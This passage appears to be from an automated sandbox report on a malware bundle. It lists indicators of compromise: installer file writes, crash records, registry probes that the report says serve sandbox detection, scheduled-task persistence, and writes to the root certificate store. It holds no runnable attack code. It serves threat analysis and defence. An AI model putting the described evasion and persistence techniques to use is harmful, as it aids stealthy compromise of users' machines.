msiexec.exeMsiExec.exedescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI8BDA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8EB9.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF0D7828F4143B646A.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIB512.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB7A3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4AA2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5CB4.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File created C:\Windows\SystemTemp\~DFCF013D295F5ADBA2.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF726973409EA54AE1.TMP msiexec.exe File opened for modification C:\Windows\Installer\43c2a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI66AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI689F.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI5E7A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI64C5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI934E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIADBE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI934F.tmp msiexec.exe File created C:\Windows\Installer\43c2a.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6205.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFFF205A00F1817829.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI83CA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8997.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 21 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5788 4824 WerFault.exe Sat20627fa1c49.exe 4008 5132 WerFault.exe Sat200240b71b.exe 5492 3824 WerFault.exe Sat20545a92617f.exe 5404 5248 WerFault.exe Sat20de8d8504.exe 1152 5528 WerFault.exe rundll32.exe 5656 860 WerFault.exe 3379467.scr 5572 4748 WerFault.exe 2.exe 5668 4792 WerFault.exe Sat20873bc74eb80e0.exe 5788 6092 WerFault.exe magaTnk_A4jqEFJV8eORLHQK.exe 5364 6352 WerFault.exe 4888429.exe 5180 4280 WerFault.exe u7WmSWxlHGRHf4l8vPpMvpUY.exe 2264 5144 WerFault.exe bM1lAK9_6qrDWhAvQCLFWrBk.exe 5112 5884 WerFault.exe rundll32.exe 6004 5324 WerFault.exe rqTLrt6ooAYbGkY2aAhbYxPP.exe 9976 10000 WerFault.exe 37EC.exe 10396 8588 WerFault.exe GcleanerEU.exe 10580 9168 WerFault.exe gcleaner.exe 10700 8992 WerFault.exe 543F.exe 11004 10848 WerFault.exe rundll32.exe 12876 11564 WerFault.exe BF31.exe 13112 11768 WerFault.exe C85A.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
fOdOVTJ4cAdpEqSN_u_aeghQ.exe7A66.exedescription ioc process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fOdOVTJ4cAdpEqSN_u_aeghQ.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fOdOVTJ4cAdpEqSN_u_aeghQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7A66.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7A66.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 7A66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fOdOVTJ4cAdpEqSN_u_aeghQ.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exe6.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5476 schtasks.exe 4692 schtasks.exe 1460 schtasks.exe 6976 schtasks.exe 6404 schtasks.exe 1668 schtasks.exe -
Enumerates system info in registry 2 TTPs 45 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe6.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeInstall.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 6.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 7636 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
sihclient.exesvchost.exemsiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe -
Modifies registry class 4 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ -
Processes:
setup_2.tmpinstaller.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B\Blob = 5c0000000100000004000000000800000f00000001000000200000003560e45b41e46b8f36537025d1d5bc02d9652a10645b0eff69e8b6a52191f335090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b000000010000005200000047006f00200044006100640064007900200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790020001320200047003200000053000000010000002500000030233021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c062000000010000002000000045140b3247eb9cc8c5b4f0d7b53091f73292089e6e5a63e2749dd3aca9198eda1400000001000000140000003a9a8507106728b6eff6bd05416e20c194da0fde1d000000010000001000000070253fbcbde32a014d38c1993098ad9903000000010000001400000047beabc922eae80e78783462a79f45c254fde68b19000000010000001000000021d008b47b7a2a81c8435903ded424c92000000001000000c9030000308203c5308202ada003020102020100300d06092a864886f70d01010b0500308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bf716208f1fa5934f71bc918a3f7804958e9228313a6c52043013b84f1e685499f27eaf6841b4ea0b4db7098c73201b1053e074eeef4fa4f2f593022e7ab19566be28007fcf316758039517be5f935b6744ea98d8213e4b63fa90383faa2be8a156a7fde0bc3b6191405caeac3a804943b467c320df3006622c88d696d368c1118b7d3b21c60b438fa028cced3dd4607de0a3eeb5d7cc87cfbb02b53a4926269512505611a44818c2ca9439623dfac3a819a0e29c51ca9e95d1eb69e9e300a39cef18880fb4b5dcc32ec85624325340256270191b43b702a3f6eb1e89c88017d9fd4f9db536d609dbf2ce758abb85f46fccec41b033c09eb49315c6946b3e0470203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604143a9a8507106728b6eff6bd05416e20c194da0fde300d06092a864886f70d01010b0500038201010099db5d79d5f99759670361f17e3b0631752da1208e4f6587b4f7a69cbcd8e92fd0db5aeecf748c73b43842da057bf80275b8fda5b1d7aef6d7de13cb53107e8a46d197fab72e2b11ab90b02780f9e89f5ae9379fabe4df6cb385179d3dd9244f799135d65f04eb8083ab9a022db510f4d890c7047340ed7225a0a99fec9eab68129957c68f123a09a4bd44fd061537c19be432a3ed38e8d864f32c7e14fc02ea9fcdff076817db2290382d7a8dd154f169e35f33ca7a3d7b0ae3ca7f5f39e5e275bac5761833ce2cf02f4cadf7b1e7ce4fa8c49b4a5406c57f7dd5080fe21cfe7e17b8ac5ef6d416b243090c4df6a76bb4998465ca7a88e2e244be5cf7ea1cf5 setup_2.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 